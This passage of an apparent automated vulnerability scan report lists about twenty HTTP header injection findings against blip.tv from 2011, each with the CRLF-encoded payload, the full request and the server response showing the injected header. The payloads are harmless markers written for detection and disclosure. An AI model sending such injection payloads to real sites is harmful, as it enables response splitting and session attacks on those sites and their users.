<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/bb0b6
b0c1664273c/AYKcqGYC"
...[SNIP]...

2.201. http://blip.tv/play/AYKcqGYC [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYKcqGYC

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload f589d%0d%0ad979631150a was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /play/f589d%0d%0ad979631150a HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/play/f589d
d979631150a

Content-Type: text/html; charset=iso-8859-1
Content-Length: 298
Date: Thu, 20 Jan 2011 00:38:41 GMT
X-Varnish: 1324529500
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/play/f589d
d979631150a">her
...[SNIP]...

2.202. http://blip.tv/play/AYKcqGYC/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYKcqGYC/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload e21a2%0d%0a89670705052 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /e21a2%0d%0a89670705052/AYKcqGYC/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/e21a2
89670705052
/AYKcqGYC/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 288
Date: Thu, 20 Jan 2011 00:38:42 GMT
X-Varnish: 1025269189
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/e21a2
89670705052/AYKcqGYC/
...[SNIP]...

2.203. http://blip.tv/play/AYKcqGYC/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYKcqGYC/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 68177%0d%0a9b57f6a14de was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /play/68177%0d%0a9b57f6a14de/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/play/68177
9b57f6a14de
/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 284
Date: Thu, 20 Jan 2011 00:38:43 GMT
X-Varnish: 344229413
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/play/68177
9b57f6a14de/">he
...[SNIP]...

2.204. http://blip.tv/play/AYKcqGYD [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYKcqGYD

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6f9f0%0d%0abcd2357f9fd was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6f9f0%0d%0abcd2357f9fd/AYKcqGYD HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/6f9f0
bcd2357f9fd
/AYKcqGYD
Content-Type: text/html; charset=iso-8859-1
Content-Length: 302
Date: Thu, 20 Jan 2011 00:38:35 GMT
X-Varnish: 1498217998
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/6f9f0
bcd2357f9fd/AYKcqGYD"
...[SNIP]...

2.205. http://blip.tv/play/AYKcqGYD [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/AYKcqGYD

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload ed49c%0d%0a7dc169f519e was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /play/ed49c%0d%0a7dc169f519e HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/play/ed49c
7dc169f519e

Content-Type: text/html; charset=iso-8859-1
Content-Length: 298
Date: Thu, 20 Jan 2011 00:38:36 GMT
X-Varnish: 344228345
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/play/ed49c
7dc169f519e">her
...[SNIP]...

2.206. http://blip.tv/play/hK5wgpzTKAI [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/hK5wgpzTKAI

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2359b%0d%0a2068ebd89cb was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2359b%0d%0a2068ebd89cb/hK5wgpzTKAI HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/2359b
2068ebd89cb
/hK5wgpzTKAI
Content-Type: text/html; charset=iso-8859-1
Content-Length: 290
Date: Thu, 20 Jan 2011 00:38:36 GMT
X-Varnish: 1248906534
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/2359b
2068ebd89cb/hK5wgpzTK
...[SNIP]...

2.207. http://blip.tv/play/hK5wgpzTKAI [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/hK5wgpzTKAI

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload d21e3%0d%0a40709f5e0a0 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /play/d21e3%0d%0a40709f5e0a0 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/play/d21e3
40709f5e0a0

Content-Type: text/html; charset=iso-8859-1
Content-Length: 298
Date: Thu, 20 Jan 2011 00:38:36 GMT
X-Varnish: 1324528736
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/play/d21e3
40709f5e0a0">her
...[SNIP]...

2.208. http://blip.tv/play/hK5wgpzTKAI.m4v/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/hK5wgpzTKAI.m4v/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7038c%0d%0afea36d9b505 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7038c%0d%0afea36d9b505/hK5wgpzTKAI.m4v/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/7038c
fea36d9b505
/hK5wgpzTKAI.m4v/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 295
Date: Thu, 20 Jan 2011 00:38:36 GMT
X-Varnish: 1274883062
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/7038c
fea36d9b505/hK5wgpzTK
...[SNIP]...

2.209. http://blip.tv/play/hK5wgpzTKAI.m4v/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/hK5wgpzTKAI.m4v/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 6cc24%0d%0ae23d6c3b0c5 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /play/6cc24%0d%0ae23d6c3b0c5/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/play/6cc24
e23d6c3b0c5
/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 284
Date: Thu, 20 Jan 2011 00:38:37 GMT
X-Varnish: 344228475
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/play/6cc24
e23d6c3b0c5/">he
...[SNIP]...

2.210. http://blip.tv/play/hbdrgpvFPAI [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/hbdrgpvFPAI

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2e516%0d%0af8e22e5a25d was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2e516%0d%0af8e22e5a25d/hbdrgpvFPAI HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/2e516
f8e22e5a25d
/hbdrgpvFPAI
Content-Type: text/html; charset=iso-8859-1
Content-Length: 290
Date: Thu, 20 Jan 2011 00:38:38 GMT
X-Varnish: 1324528912
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/2e516
f8e22e5a25d/hbdrgpvFP
...[SNIP]...

2.211. http://blip.tv/play/hbdrgpvFPAI [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/hbdrgpvFPAI

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload a8ba0%0d%0a60cebc1b852 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /play/a8ba0%0d%0a60cebc1b852 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/play/a8ba0
60cebc1b852

Content-Type: text/html; charset=iso-8859-1
Content-Length: 283
Date: Thu, 20 Jan 2011 00:38:38 GMT
X-Varnish: 1498218377
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/play/a8ba0
60cebc1b852">her
...[SNIP]...

2.212. http://blip.tv/play/hbdrgpvFPAI.m4v/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/hbdrgpvFPAI.m4v/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 61d32%0d%0a59830f082de was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /61d32%0d%0a59830f082de/hbdrgpvFPAI.m4v/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/61d32
59830f082de
/hbdrgpvFPAI.m4v/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 310
Date: Thu, 20 Jan 2011 00:38:41 GMT
X-Varnish: 2146047566
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/61d32
59830f082de/hbdrgpvFP
...[SNIP]...

2.213. http://blip.tv/play/hbdrgpvFPAI.m4v/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/hbdrgpvFPAI.m4v/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload e67be%0d%0ab38a774bfd6 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /play/e67be%0d%0ab38a774bfd6/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/play/e67be
b38a774bfd6
/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 284
Date: Thu, 20 Jan 2011 00:38:41 GMT
X-Varnish: 344229197
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/play/e67be
b38a774bfd6/">he
...[SNIP]...

2.214. http://blip.tv/play/hbgSgoqOawI [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/hbgSgoqOawI

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload f5faf%0d%0aad9111d4936 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /f5faf%0d%0aad9111d4936/hbgSgoqOawI HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/f5faf
ad9111d4936
/hbgSgoqOawI
Content-Type: text/html; charset=iso-8859-1
Content-Length: 290
Date: Thu, 20 Jan 2011 00:38:46 GMT
X-Varnish: 1274884570
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/f5faf
ad9111d4936/hbgSgoqOa
...[SNIP]...

2.215. http://blip.tv/play/hbgSgoqOawI [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/hbgSgoqOawI

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 88d2a%0d%0a103103db6ac was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /play/88d2a%0d%0a103103db6ac HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/play/88d2a
103103db6ac

Content-Type: text/html; charset=iso-8859-1
Content-Length: 283
Date: Thu, 20 Jan 2011 00:38:46 GMT
X-Varnish: 344229973
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/play/88d2a
103103db6ac">her
...[SNIP]...

2.216. http://blip.tv/play/hbgSgoqOawI.m4v/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/hbgSgoqOawI.m4v/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 4fd2e%0d%0a220762a834a was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /4fd2e%0d%0a220762a834a/hbgSgoqOawI.m4v/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/4fd2e
220762a834a
/hbgSgoqOawI.m4v/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 295
Date: Thu, 20 Jan 2011 00:38:46 GMT
X-Varnish: 1274884648
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/4fd2e
220762a834a/hbgSgoqOa
...[SNIP]...

2.217. http://blip.tv/play/hbgSgoqOawI.m4v/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/hbgSgoqOawI.m4v/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 47bf5%0d%0af684f642c98 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /play/47bf5%0d%0af684f642c98/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/play/47bf5
f684f642c98
/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 284
Date: Thu, 20 Jan 2011 00:38:47 GMT
X-Varnish: 1025269940
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/play/47bf5
f684f642c98/">he
...[SNIP]...

2.218. http://blip.tv/play/hodpgpH4MwI [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/hodpgpH4MwI

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6a214%0d%0af56409e4ca8 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6a214%0d%0af56409e4ca8/hodpgpH4MwI HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/6a214
f56409e4ca8
/hodpgpH4MwI
Content-Type: text/html; charset=iso-8859-1
Content-Length: 290
Date: Thu, 20 Jan 2011 00:38:50 GMT
X-Varnish: 1248908985
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/6a214
f56409e4ca8/hodpgpH4M
...[SNIP]...

2.219. http://blip.tv/play/hodpgpH4MwI [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/hodpgpH4MwI

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 8b662%0d%0a1fb4d628927 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /play/8b662%0d%0a1fb4d628927 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/play/8b662
1fb4d628927

Content-Type: text/html; charset=iso-8859-1
Content-Length: 283
Date: Thu, 20 Jan 2011 00:38:50 GMT
X-Varnish: 1498220485
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/play/8b662
1fb4d628927">her
...[SNIP]...

2.220. http://blip.tv/play/hodpgpH4MwI.m4v/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/hodpgpH4MwI.m4v/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload fda23%0d%0a38745f1aedb was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /fda23%0d%0a38745f1aedb/hodpgpH4MwI.m4v/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/fda23
38745f1aedb
/hodpgpH4MwI.m4v/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 295
Date: Thu, 20 Jan 2011 00:38:51 GMT
X-Varnish: 344230771
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/fda23
38745f1aedb/hodpgpH4M
...[SNIP]...

2.221. http://blip.tv/play/hodpgpH4MwI.m4v/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /play/hodpgpH4MwI.m4v/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 8e377%0d%0aaa5e4d2ecf9 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /play/8e377%0d%0aaa5e4d2ecf9/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/play/8e377
aa5e4d2ecf9
/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 299
Date: Thu, 20 Jan 2011 00:38:51 GMT
X-Varnish: 1498220580
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/play/8e377
aa5e4d2ecf9/">he
...[SNIP]...

